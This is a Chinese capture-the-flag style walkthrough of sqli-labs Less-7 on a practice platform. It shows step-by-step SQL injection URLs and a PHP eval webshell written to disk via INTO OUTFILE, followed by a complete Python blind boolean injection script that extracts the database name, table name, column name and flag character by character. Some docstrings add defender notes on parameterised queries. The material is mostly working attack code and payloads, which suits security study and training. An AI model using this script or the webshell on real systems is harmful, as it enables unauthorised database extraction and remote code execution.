Less-7

Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)

1.判断是否存在注入

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1'

错误回显 => 存在注入

2.判断参数类型

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1 and 1=2 --+

正确回显 => 字符型

3.进行参数闭合

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1' and 1=2 --+

错误回显

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1' and 1=1 --+

错误回显 => 第一位闭合正确

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) and 1=1 --+

正确回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) order by 3 --+

正确回显

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) order by 4 --+

错误回显 => 有3列

5.文件导出注入,webshell无法上传,所以使用布尔注入。

?id=1')) union select 1,2,'<?php @eval($_POST["123"]);?>' into outfile "//var//lib//mysql//shell.php" -–+

布尔注入借用python脚本

import requests
import time

# Wall-clock start; read again at the end of __main__ to report the elapsed
# time.  Every function below also binds a local ``a`` for its result string,
# so this module-level ``a`` is only visible in the __main__ block.
a = time.time()


def database_name() -> None:
    """Recover the current schema name one character at a time and print it.

    The page text is used as a boolean oracle: the substring "You are in"
    is present only when the injected condition evaluates true.  Each
    position is resolved by bisection over the ASCII window 48..122, with
    two probes per step (">" first, then "<"; neither true means equal).
    Reads the module-level ``urls`` assigned in ``__main__``.  Returns
    nothing; prints ``database_name:<value>``.

    Defender view: this leak exists only because the response body differs
    with the truth of the injected condition.  Parameterised queries remove
    the injection; a uniform response for valid and invalid ids removes the
    oracle.  In logs it shows as a long run of requests whose ``id`` value
    carries ``ascii(substr(database(),N,1))`` comparisons.
    """
    a = ''
    # NOTE(review): the name length is hard-coded to 8 (positions 1..8);
    # shorter names pick up whatever chr(mid) the search settles on.
    for i in range(1, 9):
        # 48 ~ 122
        low = 48
        high = 122
        mid = int((low + high) / 2)
        # NOTE(review): no guard for the window collapsing (low > high); a
        # character outside 48..122 appears to leave this loop spinning — verify.
        while True:
            payload = "?id=1')) and ascii(substr(database(),%d,1))>%d -- 1" % (i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # condition true: char > mid, raise the floor and keep searching
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # not greater, so less-or-equal: ask "less than" first; if not, it is equal
                payload = "?id=1')) and ascii(substr(database(),%d,1))<%d -- 1" % (i, mid)
                # submit the second probe
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # "less than" holds
                    high = mid - 1
                    mid = int((low + high) / 2)  # recentre mid
                    continue
                else:  # only equality remains
                    a = a + chr(mid)
                    break

    print('database_name:' + a)


def table_name() -> None:
    """Recover the first table name of the current schema and print it.

    Same "You are in" boolean oracle and two-probe bisection over 48..122
    as ``database_name()``; only the target expression differs — the
    first row (``limit 0,1``) of ``information_schema.tables`` filtered by
    ``table_schema=database()``.  Reads the module-level ``urls`` from
    ``__main__``.  Returns nothing; prints ``table_name:<value>``.

    Defender view: the mitigation is the same as for the schema-name leak
    — parameterised queries and responses that do not vary with the
    truth of the injected condition.
    """
    a = ''
    # NOTE(review): length hard-coded to 8 characters (positions 1..8).
    for i in range(1, 9):
        # 48 ~ 122
        low = 48
        high = 122
        mid = int((low + high) / 2)
        # NOTE(review): no guard for low > high — see database_name().
        while True:
            payload = "?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))>%d -- 1 " % (
            i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # condition true: char > mid, raise the floor and keep searching
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # not greater, so less-or-equal: ask "less than" first; if not, it is equal
                payload = "?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))<%d -- 1" % (
                i, mid)
                # submit the second probe
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # "less than" holds
                    high = mid - 1
                    mid = int((low + high) / 2)  # recentre mid
                    continue
                else:  # only equality remains
                    a = a + chr(mid)
                    break

    print('table_name:' + a)


def coulmn_name() -> None:
    """Recover one column name of table ``1BP8qvFx`` and print it.

    (The function name is misspelled — "coulmn" — but it is called by that
    name from ``__main__``, so it is left as is.)  Same "You are in"
    boolean oracle and two-probe bisection as ``database_name()``, here
    over the wider window 1..128, against the second row (``limit 1,1``)
    of ``information_schema.columns`` for the hard-coded table name found
    by ``table_name()``.  Reads the module-level ``urls`` from
    ``__main__``.  Returns nothing; prints ``column_name:<value>``.

    Defender view: same mitigation as the other leaks — parameterised
    queries and condition-independent responses.
    """
    a = ''
    # NOTE(review): length hard-coded to 8 characters (positions 1..8).
    for i in range(1, 9):
        # 1 ~ 128 (wider than the 48 ~ 122 window used by the two functions above)
        low = 1
        high = 128
        mid = int((low + high) / 2)
        # NOTE(review): no guard for low > high — see database_name().
        while True:
            payload = "?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='1BP8qvFx' limit 1,1),%d,1))>%d -- 1 " % (
            i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # condition true: char > mid, raise the floor and keep searching
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # not greater, so less-or-equal: ask "less than" first; if not, it is equal
                payload = "?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='1BP8qvFx' limit 1,1),%d,1))<%d  -- 1" % (
                i, mid)
                # submit the second probe
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # "less than" holds
                    high = mid - 1
                    mid = int((low + high) / 2)  # recentre mid
                    continue
                else:  # only equality remains
                    a = a + chr(mid)
                    break

    print('column_name:' + a)


def flag() -> None:
    """Recover the ``flag`` column of the fourth row of ``1BP8qvFx`` and print it.

    Same "You are in" boolean oracle and two-probe bisection over 1..128 as
    ``coulmn_name()``, against ``select flag from 1BP8qvFx limit 3,1``
    (offset 3 = fourth row).  Unlike the other functions it prints the
    partial string after every resolved character, so progress is visible
    during the run.  Reads the module-level ``urls`` from ``__main__``.
    Returns nothing; prints ``flag:<value>`` at the end.

    Defender view: identical root cause and mitigation as the schema,
    table and column leaks above.
    """
    a = ''
    # NOTE(review): length hard-coded to 42 characters (positions 1..42).
    for i in range(1, 43):
        # 1 ~ 128 (the "48 ~ 122" note carried over from the earlier functions no longer applies)
        low = 1
        high = 128
        mid = int((low + high) / 2)
        # NOTE(review): no guard for low > high — see database_name().
        while True:
            payload = "?id=1')) and ascii(substr((select flag from 1BP8qvFx limit 3,1),%d,1))>%d -- 1" % (i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # condition true: char > mid, raise the floor and keep searching
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # not greater, so less-or-equal: ask "less than" first; if not, it is equal
                payload = "?id=1')) and ascii(substr((select flag from 1BP8qvFx limit 3,1),%d,1))<%d  -- 1" % (i, mid)
                # submit the second probe
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # "less than" holds
                    high = mid - 1
                    mid = int((low + high) / 2)  # recentre mid
                    continue
                else:  # only equality remains
                    a = a + chr(mid)
                    print(a)  # running partial result
                    break

    print('flag:' + a)


if __name__ == '__main__':
    # Module-level base URL read by every function above via the global
    # ``urls``; the trailing "/" matters because each payload starts with
    # "?id=".  NOTE(review): this host differs from the instance URL quoted
    # in the write-up text above — confirm which one is intended.
    urls = 'https://636-2f3d6806-1ccd-4ae6-96be-4062e1d1f155.do-not-trust.hacking.run/'
    # The stages are meant to be run one at a time, top to bottom.
    # database_name()
    # table_name()   # once the database name is known, edit the code above and enable this
    # coulmn_name()
    flag()

    # ``a`` here is the module-level start time set above, not a function's
    # local result string.
    b = time.time()
    print('折半查找法 :Running time: %s Seconds' % (b - a))